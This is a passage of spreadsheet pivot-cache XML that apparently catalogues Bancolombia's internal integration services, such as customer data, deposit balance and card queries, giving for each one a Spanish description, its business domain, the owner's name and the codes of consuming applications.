    <s v="NU0102001 _x000d__x000a_NU0098001 _x000d__x000a_AW0360004 _x000d__x000a_AW0748001 _x000d__x000a_AW1281002 _x000d__x000a_NU0143001 _x000d__x000a_AW1074001 _x000d__x000a_SVP _x000d__x000a_AW0611001 _x000d__x000a_AW1206001 _x000d__x000a_AW0360007 _x000d__x000a_NU0104001 _x000d__x000a_AW1302001 _x000d__x000a_NU0004001 _x000d__x000a_NU0064001 _x000d__x000a_AW1281003 _x000d__x000a_NU0010001 _x000d__x000a_AW1313001 _x000d__x000a_NU0035001 _x000d__x000a_AW1151001 _x000d__x000a_NU0046001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001 _x000d__x000a_NU0142001 _x000d__x000a_AW1326001 _x000d__x000a_AW1365 _x000d__x000a_AW1218001 _x000d__x000a_AW1285001 _x000d__x000a_NU0170001 _x000d__x000a_AW1176 _x000d__x000a_AW0660001 _x000d__x000a_AW0661003 _x000d__x000a_NU0152001 _x000d__x000a_AW1272001 _x000d__x000a_AW1480001 _x000d__x000a_NU0219001 _x000d__x000a_NU0091001 _x000d__x000a_NU0254001 _x000d__x000a_NU0139001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Financieros Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio sirve para consultar la información financiera de los clientes (ejemplo: Ingresos, Egresos, Pasivos, Activos, entre otros). El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente, documento externo o con tipo y número de documento original del cliente. La información que se retorna corresponde a los datos maestros del cliente Bancolombia Colombia."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0748001 _x000d__x000a_AW1285001 _x000d__x000a_AW0661003 _x000d__x000a_NU0254001 _x000d__x000a_AW1074001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Personales Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite consultar la información personal básica del cliente (ejemplo: llave MDM, Tipo identificación, identificación, nombre, apellido del cliente, entre otros) y la información detallada del cliente (ejemplo: ciudad de nacimiento, Fecha nacimiento, Primer nombre, Primer apellido, entre otros). El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente, documento externo o con tipo y número de documento original del cliente. La información que se retorna corresponde a los datos maestros del cliente Bancolombia Colombia"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="NU0102001 _x000d__x000a_NU0034001 _x000d__x000a_AW0360004 _x000d__x000a_AW0748001 _x000d__x000a_AW0899001 _x000d__x000a_AW1258002 _x000d__x000a_AW1281002 _x000d__x000a_NU0143001 _x000d__x000a_AW1074001 _x000d__x000a_SVP _x000d__x000a_NU0038001 _x000d__x000a_AW1272001 _x000d__x000a_AW0611001 _x000d__x000a_GDE _x000d__x000a_NU0104001 _x000d__x000a_NU0014001 _x000d__x000a_AW1302001 _x000d__x000a_AW1310 _x000d__x000a_NU0064001 _x000d__x000a_AW1281003 _x000d__x000a_NU0139001 _x000d__x000a_APP _x000d__x000a_AW1108001 _x000d__x000a_AW0955 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_CIF _x000d__x000a_AW1313001 _x000d__x000a_AUD _x000d__x000a_NU0035001 _x000d__x000a_AW1151001 _x000d__x000a_NU0046001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001 _x000d__x000a_NU0142001 _x000d__x000a_AW0638 _x000d__x000a_AW1365 _x000d__x000a_NU0004001 _x000d__x000a_AW1326001 _x000d__x000a_AW1285001 _x000d__x000a_NU0135001 _x000d__x000a_NU0170001 _x000d__x000a_AW1435001 _x000d__x000a_AW1176 _x000d__x000a_AW0661003 _x000d__x000a_AW1480001 _x000d__x000a_AW1184003 _x000d__x000a_NU0219001 _x000d__x000a_NU0091001 _x000d__x000a_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Relaciones Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite consultar la información de las relaciones o vínculos del cliente, por ejemplo: Referencia comercial, referencia personal, referencia familiar, abogado, ejecutivo de portafolio, entre otros. El servicio puede ser consultado con el tipo y número de documento original del cliente, o las llaves de los sistemas: CRM, MDM o CIF.  Los clientes consultados corresponden a persona natural y persona jurídica"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0360004 _x000d__x000a_AW1074001 _x000d__x000a_NU0142001 _x000d__x000a_NU0135001 _x000d__x000a_AW1285001 _x000d__x000a_AW1176001 _x000d__x000a_NU0091001 _x000d__x000a_NU0046001 _x000d__x000a_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Tarjeta Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio que permite realizar las diferentes consultas de datos asociados a las tarjetas de crédito, donde se retorna información de campos de saldos, consumos, intereses y abonos de la tarjeta de crédito que se pueden exponer a nivel de los clientes."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="AW1165"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Tributarios Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite consultar la información tributaria del cliente, estos datos corresponden a la información de impuestos, retención, entre otros. El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente, documento externo o con tipo y número de documento original del cliente. La información que se retorna corresponde a los datos maestros del cliente Bancolombia Colombia."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0748001 _x000d__x000a_AW1074001 _x000d__x000a_NU0139001 _x000d__x000a_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta De Archivos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Nos permite realizar la consulta de los archivos tanto Enviados como Recibidos (ejemplo: Novedades, Cobro, Facturación y Anulación, etc.), inicialmente de los pagos realizados por un cliente a través de los diferentes canales de un convenio. _x005f_x000D_ _x005f_x000D_ Y además para proporcionar al cliente una asesoría completa de sus movimientos._x005f_x000D_ "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="AW01065 _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta De Pagos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Consultar Pagos permite al consumidor obtener información de los pagos en el Sistema de Pagos Automáticos PAB, ingresando la información correspondiente a la identificación del cliente pagador y opcionalmente podrá ingresar información asociada a la clase de pago, tipo de pago, beneficiario y cuenta del beneficiario con el fin de acotar la búsqueda. Esta consulta se puede realizar hasta tres meses atrás."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1258011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta De Saldos Cuentas Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El Servicio Consulta De Saldos Cuentas Depósitos permite a los consumidores obtener el detalle de los saldos que tiene una cuenta en particular o listar los saldos de todas las cuentas de un cliente. Se puede consultar por ejemplo el saldo disponible, saldo con cupo de sobregiro, saldo en canje, saldo en cuentas por cobrar, saldo bloqueado entre otros."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW1170 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0001001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta De Tarifas Tarjetas Debito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta de Tarifas permite exponer los diferentes valores asociados a una tarjeta débito_x000a_- Consultar Cuota de Manejo: Expone los datos relacionados con la cuota de manejo de la tarjeta débito dependiendo del_x000a_plan de la cuenta, clase de la tarjeta y grupo de cobro."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0091001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Desembolso Credito Pyme"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Desembolso Crédito Pyme, permite obtener la información del estado al momento de la consulta de los distintos procesos de desembolso de crédito pyme."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Desembolso Credito Pyme"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Desembolso Crédito Pyme, permite obtener la información del estado al momento de la consulta de los distintos procesos de desembolso de crédito pyme. "/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW1170 _x000d__x000a_AW1287 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Documentos Cuenta Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaDocumentosCuentaDepositos permitirá a los consumidores consultar la información necesaria para construir documentos como certificados, recomendaciones, movimientos de cuentas de sus productos como cuenta corriente o ahorros."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="DEP - Servicios Depositos_ISDEP0001"/>
    <s v="AW1272001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Documentos Tarjeta Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaDocumentosTarjetaCredito permitirá a los consumidores consultar la información necesaria para construir documentos como certificados, recomendaciones, movimientos de cuentas y paz y salvos de sus tarjetas de crédito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="AW1272001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Extendida De Saldos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaExtendidaDeSaldos tiene como objetivo realizar la consulta de saldos de las cuentas depósitos (Ahorros /Corriente) de un cliente Bancolombia de la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco.&amp;"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depósitos (Cuentas Corriente y de Ahorro) Personalizacion_ISBVD0001"/>
    <s v="NU0017001 _x000d__x000a_AW1272001 _x000d__x000a_AW1302001 _x000d__x000a_SVE _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Extractos Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite la consultar los extractos y los periodos disponibles para consulta, de los productos de un cliente. El extracto se genera en formato Base64, para que el consumidor pueda posteriormente decodificarlo a un formato como PDF."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <s v="Paradoc - Extracto Unificado FE_EUC,COLD,EBP, MAM_AW0826001"/>
    <s v="NU0021001 _x000d__x000a_AW1272001 _x000d__x000a_AW1218001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Facturas Inscritas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio consulta de facturas inscritas permitirá conocer las facturas que tienen registradas un pagador con sus caracteristicas, como son: Disponibilidad para pago, si está ligada a un debito automatico, canal, fecha de registro, entre otros."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Fondos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Fondos, agrupa todas las consultas (Específicas y detalladas) que se le pueden hacer a los Fondos de inversión de los productos de valores y fiduciaria del Grupo Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AW0637001 _x000d__x000a_AW0360004 _x000d__x000a_SVE _x000d__x000a_AW1185001 _x000d__x000a_AW1177001 _x000d__x000a_NU0170001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Fondos"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Este servicio permitirá a los consumidores realizar la consulta específica y detallada de los fondos de inversión colectiva (FIC) del Grupo Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AW1185001 _x000d__x000a_NU0021001 _x000d__x000a_NU0149001 _x000d__x000a_AW1177001 _x000d__x000a_SVE _x000d__x000a_NU0160001 _x000d__x000a_NU0170001 _x000d__x000a_NU0153001 _x000d__x000a_NU0146001 _x000d__x000a_AW0955001 _x000d__x000a_NU0051001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Fuentes Privadas Externas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio que permite conocer si un documento es válido y adicionalmente traer información de ese documento. Bien sea de personas naturales o jurídicas."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Gestion Comercial Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio posibilita a nuevos consumidores o nuevos componentes la reutilización expuesta por el servicio ConsultaGestionComercialCliente, el cual sirve para consultar información de Gestión comercial de los clientes. El servicio obtiene su información de componentes de integración del tipo función de mediación, los cuales implementa las operaciones correspondientes para acceder a cada funcionalidad provista por los datos maestros de MDM de información implementadas a través de procedimientos almacenados. Este servicio consulta la información de datos maestros de los clientes de Colombia.  El servicio actual cuenta con 2 operaciones las cuales permiten consultar la información a la base de datos MDM enviando la llave de identificación del cliente (CIF;CRM;MDM;NumeroIDentificacion;documentoExterno), retornando la información específica del cliente,  convirtiéndose en un componente de consulta general  de Master Data Management (MDM),  que pueda ser utilizado para diferentes necesidades de información de los frentes  y no quedar ligado o ser una consulta exclusiva que retorne la información a la medida de una sola necesidad"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="NU0102001 _x000d__x000a_AW0360004 _x000d__x000a_AW1285001 _x000d__x000a_AW0748001 _x000d__x000a_AW0899001 _x000d__x000a_AW1074001 _x000d__x000a_SVP _x000d__x000a_NU0038001 _x000d__x000a_AW1272001 _x000d__x000a_AW1302001 _x000d__x000a_MAT _x000d__x000a_NU0114001 _x000d__x000a_AW1313001 _x000d__x000a_NU0046001 _x000d__x000a_AW1326001 _x000d__x000a_AW1250 _x000d__x000a_NU0135001 _x000d__x000a_NU0021001 _x000d__x000a_AW1249001 _x000d__x000a_NU0034001 _x000d__x000a_AW1281003 _x000d__x000a_NU0032001 _x000d__x000a_AW1176 _x000d__x000a_AW0661003 _x000d__x000a_AW1151001 _x000d__x000a_AW1176001 _x000d__x000a_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Gestion Tarjetas Debito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Gestión tarjetas Débito permite consultar la gestión que se han realizado en una tarjeta débito:"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta GMF"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El Servicio ConsultaCaracteristicasPlanCuenta  habilita las capacidades que permite consultar el detalle de la marcación de la cuenta sobre el impuesto GMF (Gravamen a movimientos financieros). "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0091001 _x000d__x000a_NU0170001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Grupos De Riesgo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene como alcance consultar los integrantes de los grupos de Riesgo Legales y administrativos o internos de un cliente empresarial."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW1176 _x000d__x000a_AW0922 _x000d__x000a_AW1294001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Bolsillos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Bolsillos Bancolombia permite separar los recursos de una cuenta de ahorros para mantener diferentes ahorros en bolsillos separados con una meta en específico, por ejemplo, ahorros para viajes, salud, alimentación, transporte etc.  El servicio ConsultaInformacionBolsillos habilita las capacidades de consulta de bolsillos como, por ejemplo, consultar los bolsillos de una cuenta de ahorros en específico, consultar el detalle de un bolsillo, listar las diferentes categorías por las cuales se puede separar el dinero entre otras."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="NU0021001 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0146001 _x000d__x000a_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Cliente Empresarial"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Información Cliente Empresarial permite la consulta de información general, información financiera y la información de contactos, accionistas y miembros de junta de una empresa particular sea persona natural o jurídica."/>
    <s v="CLIENTES"/>
    <s v="Clientes Empresas"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <s v="BIZTRACK_AW0998001"/>
    <s v="APIC _x000d__x000a_AW1176 _x000d__x000a_AW0856 _x000d__x000a_AW0360004"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Cuentas Depositos"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio consulta información cuentas, traerá todas las cuentas activas/inactivas y que permiten débitos de un cliente."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="APIC"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Cuentas Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio consulta información cuentas, traerá todas las cuentas activas/inactivas y que permiten débitos de un cliente."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="APIC"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Cuentas Depositos"/>
    <n v="300"/>
    <s v="No Aplica"/>
    <s v="El servicio consulta información cuentas, traerá todas las cuentas activas/inactivas y que permiten débitos de un cliente."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Cuentas Plazos Fijos"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaInformacionCuentasPlazosFijos proporciona a los consumidores, capacidades para realizar las diferentes transacciones no monetarias sobre la información las cuentas de plazos fijos."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Cuentas Plazos Fijos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaInformacionCuentasPlazosFijos proporciona a los consumidores, capacidades para realizar las diferentes transacciones no monetarias sobre la información las cuentas de plazos fijos."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="APIC"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Entrega Token SVE"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite que se realicen consultas sobre la gestión de entrega de los tokens físicos que han sido asignados a los clientes empresas del Grupo Bancolombia."/>
